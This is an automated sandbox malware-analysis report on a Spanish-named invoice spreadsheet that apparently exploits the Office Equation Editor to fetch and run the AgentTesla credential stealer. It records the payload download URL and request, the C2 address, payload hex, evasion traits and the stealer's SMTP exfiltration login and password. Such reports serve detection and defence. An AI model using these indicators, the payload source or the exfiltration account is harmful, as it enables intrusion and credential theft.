Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURA 3879843.xlsx

Overview

General Information

Sample Name:FACTURA 3879843.xlsx
Analysis ID:452698
MD5:9ae3b1aa2c80f4e12e33569d7b5839df
SHA1:8579f018a10f93cedbb73369fb8c7b66416d9846
SHA256:82737660638921bf4d3e82bf4c059ec3cb0b61bd988365572bd4207b87ceb060
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2656 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 260 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3068 cmdline: 'C:\Users\Public\vbc.exe' MD5: E8194372570D57749B3033E063BDC5D8)
      • vbc.exe (PID: 1772 cmdline: C:\Users\Public\vbc.exe MD5: E8194372570D57749B3033E063BDC5D8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "katie.fox@snythomer.com", "Password": "wirelord3116", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        Process Memory Space: vbc.exe PID: 1772JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: vbc.exe PID: 1772JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                Sigma Overview

                Exploits:

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.91.148, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 260, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 260, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 260, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068
                Sigma detected: Execution from Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 260, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 7.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "katie.fox@snythomer.com", "Password": "wirelord3116", "Host": "us2.smtp.mailhostbox.com"}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://198.12.91.148/oso.exeVirustotal: Detection: 8%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: FACTURA 3879843.xlsxVirustotal: Detection: 30%Perma Link
                Source: FACTURA 3879843.xlsxReversingLabs: Detection: 28%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJoe Sandbox ML: detected
                Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
                Source: excel.exeMemory has grown: Private usage: 4MB later: 75MB
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 16:18:32 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Thu, 22 Jul 2021 07:24:36 GMTETag: "f9800-5c7b12de621e5"Accept-Ranges: bytesContent-Length: 1021952Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 1d f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 32 0c 00 00 62 03 00 00 00 00 00 2e 51 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 10 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 50 0c 00 4b 00 00 00 00 80 0c 00 e8 5d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 31 0c 00 00 20 00 00 00 32 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 60 0c 00 00 02 00 00 00 36 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5d 03 00 00 80 0c 00 00 5e 03 00 00 38 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0f 00 00 02 00 00 00 96 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A2F8885.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://pcLwYQ.com
                Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
                Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: 69CBECC2.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                Source: vbc.exe, 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                System Summary:

                barindex
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeCode function: 7_2_003265D07_2_003265D0
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00325F487_2_00325F48
                Source: C:\Users\Public\vbc.exeCode function: 7_2_003220997_2_00322099
                Source: C:\Users\Public\vbc.exeCode function: 7_2_003264807_2_00326480
                Source: C:\Users\Public\vbc.exeCode function: 7_2_003256787_2_00325678
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00EC78467_2_00EC7846
                Source: FACTURA 3879843.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: oso[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: oso[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/13@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$FACTURA 3879843.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE964.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: FACTURA 3879843.xlsxVirustotal: Detection: 30%
                Source: FACTURA 3879843.xlsxReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: FACTURA 3879843.xlsxStatic file information: File size 1227776 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: FACTURA 3879843.xlsxInitial sample: OLE indicators vbamacros = False
                Source: FACTURA 3879843.xlsxInitial sample: OLE indicators encrypted = True
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56201911233
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56201911233
                Source: oso[1].exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
                Source: oso[1].exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: oso[1].exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: oso[1].exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: oso[1].exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: oso[1].exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: oso[1].exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: oso[1].exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: oso[1].exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: oso[1].exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: oso[1].exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: oso[1].exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: oso[1].exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: vbc.exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
